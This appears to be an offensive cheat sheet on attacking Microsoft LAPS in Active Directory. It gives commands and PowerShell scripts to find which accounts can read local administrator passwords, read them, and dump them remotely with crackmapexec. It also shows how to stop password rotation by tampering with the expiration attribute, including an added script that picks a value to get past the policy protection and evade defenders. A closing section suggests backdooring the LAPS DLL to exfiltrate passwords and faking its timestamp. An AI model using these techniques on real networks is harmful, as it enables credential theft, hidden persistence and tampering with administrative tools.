LAPS


Basic Information

Local Administrator Password Solution (LAPS) is a tool used for system administration in which the local administrator passwords of domain-joined computers are unique, randomly generated and rotated on a regular basis. These passwords are stored in Active Directory and are readable only by principals that have been granted permission through Access Control Lists (ACLs). The password is transmitted from the client to the domain controller over Kerberos version 5 with AES encryption.

Deploying LAPS adds two new attributes to the domain's computer objects: ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime. They store the cleartext local administrator password and its expiration time, respectively. ms-Mcs-AdmPwd is a confidential attribute, so it is only returned to callers that hold the extended right on it; the expiration time is readable by default.

Check if activated

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS Password Access

You can download the raw LAPS policy from \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol and then use Parse-PolFile from the GPRegistryPolicyParser package to convert the file into a human-readable format (the GUID above is just the example GPO's; take it from the Get-DomainGPO output of the target domain).

Moreover, the native LAPS PowerShell cmdlets can be used if they're installed on a machine we have access to:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView can also be used to find out who can read the password, and to read it:

# Find the principals that have ReadProperty on ms-Mcs-AdmPwd (resolve the ACE GUIDs so the attribute name is visible)
Get-DomainObjectAcl -Identity wkstn-2 -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } |
    % { $_ | Add-Member NoteProperty Identity (ConvertFrom-SID $_.SecurityIdentifier) -PassThru } | select Identity, ActiveDirectoryRights

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
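The same enumeration and read attempt can be done with nothing but the .NET ADSI classes, which is handy when neither PowerView nor the AdmPwd.PS module is on the box. The following is an added example written for this page (it is not code from HackTricks or from the LAPS project): it lists every computer that has ms-Mcs-AdmPwdExpirationTime populated, decodes the FILETIME expiration, and reports whether the current user can actually read ms-Mcs-AdmPwd. The search base defaults to the current domain and the function name is the example's own.

```powershell
# Added example: enumerate LAPS-managed computers via plain ADSI and test
# whether the current user can read the cleartext password.
# Assumptions: run from a domain-joined host as a domain user; SearchBase
# defaults to the current domain root and can be narrowed to an OU.
function Get-LapsComputerStatus {
    param(
        [string]$SearchBase = ([ADSI]"LDAP://RootDSE").defaultNamingContext
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # Only computers with the expiration attribute populated are LAPS-managed.
    $searcher.Filter = "(&(objectCategory=computer)(ms-Mcs-AdmPwdExpirationTime=*))"
    $searcher.PageSize = 1000
    $searcher.PropertiesToLoad.AddRange([string[]]@('dNSHostName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

    foreach ($result in $searcher.FindAll()) {
        $props = $result.Properties   # keys come back lower-cased

        # Expiration is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC).
        # Values past year 9999 (a crude persistence trick) would make FromFileTimeUtc throw.
        $ft = [long]$props['ms-mcs-admpwdexpirationtime'][0]
        $expiry = if ($ft -le [DateTime]::MaxValue.ToFileTimeUtc()) { [DateTime]::FromFileTimeUtc($ft) } else { [DateTime]::MaxValue }

        # AD silently omits a confidential attribute for callers without the
        # CONTROL_ACCESS right, so "missing" means "not readable by us", not "unset".
        $password = if ($props.Contains('ms-mcs-admpwd')) { $props['ms-mcs-admpwd'][0] } else { $null }

        [PSCustomObject]@{
            ComputerName = $props['dnshostname'][0]
            Expiration   = $expiry
            Expired      = $expiry -lt (Get-Date).ToUniversalTime()
            CanReadPwd   = [bool]$password
            Password     = $password
        }
    }
}

# Usage: overview of every LAPS host, then only those whose password we can read
Get-LapsComputerStatus | Format-Table ComputerName, Expiration, Expired, CanReadPwd -AutoSize
Get-LapsComputerStatus | Where-Object CanReadPwd | Format-List ComputerName, Password
```

An expiration far in the future or a password that is readable by a low-privileged account are both findings worth recording: the first hints at tampering with ms-Mcs-AdmPwdExpirationTime (see the persistence section), the second at over-broad delegation on the OU.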

LAPSToolkit

LAPSToolkit makes enumerating LAPS easier with several functions. One parses the ExtendedRights of every computer that has LAPS enabled. This reveals the groups specifically delegated to read LAPS passwords, which are often members of protected groups. The account that joined a computer to the domain receives All Extended Rights over that host, and that right allows it to read the password. Enumeration can therefore surface an ordinary user account that can read the LAPS password of a host, which helps target specific AD users who can read LAPS passwords.

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, their expiration time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Dumping LAPS Passwords With Crackmapexec

If you have no PowerShell access, you can abuse the same read right remotely over LDAP with

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.

LAPS Persistence

Expiration Date

Once you are admin on a host (or otherwise able to write to its computer object), it's possible to obtain the password and stop the machine from rotating it by pushing the expiration date into the future: the LAPS client only generates a new password when the stored expiration time has passed.

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## Requires SYSTEM on the computer (the machine account may write its own expiration attribute) or write rights on the computer object in AD
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

The password will still be reset if an admin runs the Reset-AdmPwdPassword cmdlet, or if Do not allow password expiration time longer than required by policy is enabled in the LAPS GPO: in that case the client resets the password as soon as it sees an expiration further away than the policy's password age allows.
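The value written above is an opaque FILETIME, and whether it survives depends on the GPO setting just mentioned. The following added example (written for this page, not code from HackTricks or the LAPS project) decodes such a value and computes the latest expiration the client will accept when the protection is on, using the legacy LAPS registry values PasswordAgeDays and PwdExpirationProtectionEnabled; the computer name wkstn-2 is the page's example, and the function names are the example's own. It assumes it runs on the target computer (to read its applied policy) with rights to write ms-Mcs-AdmPwdExpirationTime, and uses PowerView for the write as the page does.

```powershell
# Added example: decode the LAPS expiration FILETIME and pick a replacement that
# survives "Do not allow password expiration time longer than required by policy".
# Assumptions: runs on the managed computer; PowerView loaded; wkstn-2 is the target.
$LapsPolicyKey = 'HKLM:\Software\Policies\Microsoft Services\AdmPwd'

function ConvertFrom-LapsFileTime {
    param([Parameter(Mandatory)][long]$FileTime)
    # FILETIME = 100 ns ticks since 1601-01-01 UTC, same encoding as pwdLastSet/lastLogon
    [DateTime]::FromFileTimeUtc($FileTime)
}

function Get-LapsExpirationCeiling {
    # With PwdExpirationProtectionEnabled the client resets the password whenever the
    # stored expiration lies further out than now + PasswordAgeDays.
    $policy = Get-ItemProperty -Path $LapsPolicyKey -ErrorAction SilentlyContinue
    $ageDays   = if ($policy.PasswordAgeDays) { [int]$policy.PasswordAgeDays } else { 30 }  # 30 is the LAPS default
    $protected = [bool]$policy.PwdExpirationProtectionEnabled
    [PSCustomObject]@{
        PasswordAgeDays   = $ageDays
        ProtectionEnabled = $protected
        # stay an hour under the ceiling so DC/client clock skew cannot trip the check
        SafeExpirationUtc = (Get-Date).ToUniversalTime().AddDays($ageDays).AddHours(-1)
    }
}

# 1. Decode the value used on this page: 232609935231523081 is February 2338,
#    which stands out immediately to anyone reviewing expiration times.
ConvertFrom-LapsFileTime 232609935231523081

# 2. Choose an expiration the client will not immediately undo
$ceiling   = Get-LapsExpirationCeiling
$newExpiry = if ($ceiling.ProtectionEnabled) {
    $ceiling.SafeExpirationUtc                       # at most PasswordAgeDays ahead
} else {
    (Get-Date).ToUniversalTime().AddYears(10)        # no protection: any future date works
}
$fileTime = $newExpiry.ToFileTimeUtc()

# 3. Write it with PowerView and read it back as a date to confirm
Set-DomainObject -Identity wkstn-2 -Set @{ 'ms-mcs-admpwdexpirationtime' = "$fileTime" }
$stored = (Get-DomainObject -Identity wkstn-2 -Properties ms-mcs-admpwdexpirationtime).'ms-mcs-admpwdexpirationtime'
ConvertFrom-LapsFileTime ([long]$stored)
```

With the protection enabled this caps persistence at one password age, so the realistic gain is a few weeks at most; when it is disabled, the decoded date is the defender's main clue, which is why a value that is merely "a bit too far out" is harder to spot than one in the year 2338.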

Backdoor

The original LAPS source code can be found here, so it's possible to backdoor it (for example inside the Get-AdmPwdPassword method in Main/AdmPwd.PS/Main.cs) so that every newly retrieved password is exfiltrated or stored somewhere the attacker can reach.

Then just compile the new AdmPwd.PS.dll and upload it to the machine at C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (and adjust its modification timestamp so it matches the original).
